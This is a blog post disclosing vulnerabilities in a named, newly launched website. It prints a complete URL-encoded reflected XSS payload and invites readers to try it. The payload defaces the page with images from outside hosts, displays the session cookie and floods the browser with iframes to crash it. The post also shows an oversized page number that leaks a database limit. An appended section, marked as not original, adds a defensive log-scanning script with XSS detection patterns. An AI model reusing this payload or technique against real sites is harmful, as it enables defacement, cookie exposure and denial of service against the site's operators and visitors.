[Edit] : sorry it's opendz.net and not opendz.com as stated before.
[Edit2] : see the end of the post.
It has been less than 30 seconds since I saw a post on my RSS feed about a new "Algerian" website, http://opendz.net/; details are here.
I'm not sure, but... is any Algerian website out there vulnerable? I don't know why, but it is; just 10 seconds were enough for me to see the whole picture of this newborn.
Some screenshots :
Try this script, may crash your browser: http://opendz.net/?s=%3Cscript%3Evar+b1+%3D+document.getElementById(%22box1%22)%3Bb1.innerHTML+%3D+%22%3Cimg+src%3D%27http%3A%2F%2Fdiije.paradisia.net%2Fimages%2Fpirate.gif%27%2F%3E%22%3Bvar+b2+%3D+document.getElementById(%22box2%22)%3Bb2.innerHTML+%3D+%22%3Cimg+src%3D%27http%3A%2F%2Fdiije.paradisia.net%2Fimages%2Fpirate.gif%27%2F%3E%22%3Bvar+header+%3D+document.getElementById(%22header%22)%3Bheader.innerHTML+%3D+%22%3Cimg+src%3D%27http%3A%2F%2Fwww.spookynoodleghost.com%2Fshakelasta%2FShakeLastaPirateBanner.jpg%27%2F%3E%22%3Bvar+s%3D+document.getElementById(%22searchform%22)%3Bs.innerHTML+%3D+%22%3Ch2%3E%22+%2B+document.cookie+%2B+%22%3C%2Fh2%3E%22%3BsetTimeout(%22crash()%22%2C+4000)%3Bfunction+crash(){for(i%3D0%3Bi%3C500%3Bi%2B%2B){var+frame1+%3D+document.createElement(%22iframe%22)%3Bframe1.setAttribute(%22src%22%2C%22wp-admin%22)%3Bframe1.setAttribute(%22name%22%2C%22frame1%22)%3Bdocument.body.appendChild(frame1)%3B}%3Balert(%22%22)%3B}%3C%2Fscript%3E
So once again, web development is not just some simple CSS and nasty PHP scripts, it goes beyond that! (Try ASP.NET maybe; it has a built-in XSS filter, so I'll try to figure out other tests beyond XSS :D )
[Edit2]:
Apparently we can even investigate some database information. For example, we can know that the type of the field used for the paging is a SMALLINT UNSIGNED. This is not too bad, but it is better never to reveal any information about your DB. Wondering how I know? Here it is: http://opendz.net/rubrique/actualites/page/222222222222222222222222222222222222222222222222222222222222/ Look how the 2s are clamped to the biggest value the record in the database can hold, which is 2147483647.
Anyway, never feel sad about this, because some giants (or so they seem) make the same errors, like this one for example: http://twitter.com/martani_net/status/3819027462 (look closely at the title of the page, stating "database error").
I think I'm gonna talk a little about ASP.NET and .NET in general next time; maybe people will change their mind and go out to see what's beyond PHP XD.
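An added example, not part of the original post: a small Python triage pass over web-server request lines that flags the two request shapes discussed above, markup arriving in the `s` search parameter and an oversized number in a `/page/<n>/` path. The sample request lines, the `MAX_PAGE` ceiling and all function names are assumptions made up for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request lines for illustration; not taken from any real server log.
SAMPLE_REQUESTS = [
    "GET /?s=couscous+recipe HTTP/1.1",
    "GET /?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1",
    "GET /?s=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1",
    "GET /rubrique/actualites/page/3/ HTTP/1.1",
    "GET /rubrique/actualites/page/22222222222222222222/ HTTP/1.1",
]

# Heuristic only: an opening/closing tag, an inline event handler, or a javascript: URL.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.IGNORECASE)
PAGE = re.compile(r"/page/(\d+)/?$")
MAX_PAGE = 10_000  # assumed policy ceiling, not a value from the post


def classify(request_line):
    """Return the list of findings for one 'METHOD target PROTOCOL' line."""
    try:
        _method, target, _protocol = request_line.split(" ", 2)
    except ValueError:
        return ["malformed"]
    parts = urlsplit(target)
    findings = []
    # parse_qs percent-decodes once; unquote again to catch double encoding.
    for value in parse_qs(parts.query, keep_blank_values=True).get("s", []):
        if MARKUP.search(unquote(value)):
            findings.append("markup-in-search")
    match = PAGE.search(parts.path)
    if match:
        digits = match.group(1).lstrip("0") or "0"
        # Compare lengths first so a huge digit run is never converted.
        if len(digits) > len(str(MAX_PAGE)) or int(digits) > MAX_PAGE:
            findings.append("page-out-of-range")
    return findings


def scan(lines):
    """Map each flagged request line to its findings; clean lines are omitted."""
    return {line: found for line in lines if (found := classify(line))}


if __name__ == "__main__":
    for line, found in scan(SAMPLE_REQUESTS).items():
        print(found, line)
```

Pattern matching on logs only surfaces probing. The fix on the server side is to HTML-encode the search term when echoing it and to validate the page number before it reaches the query.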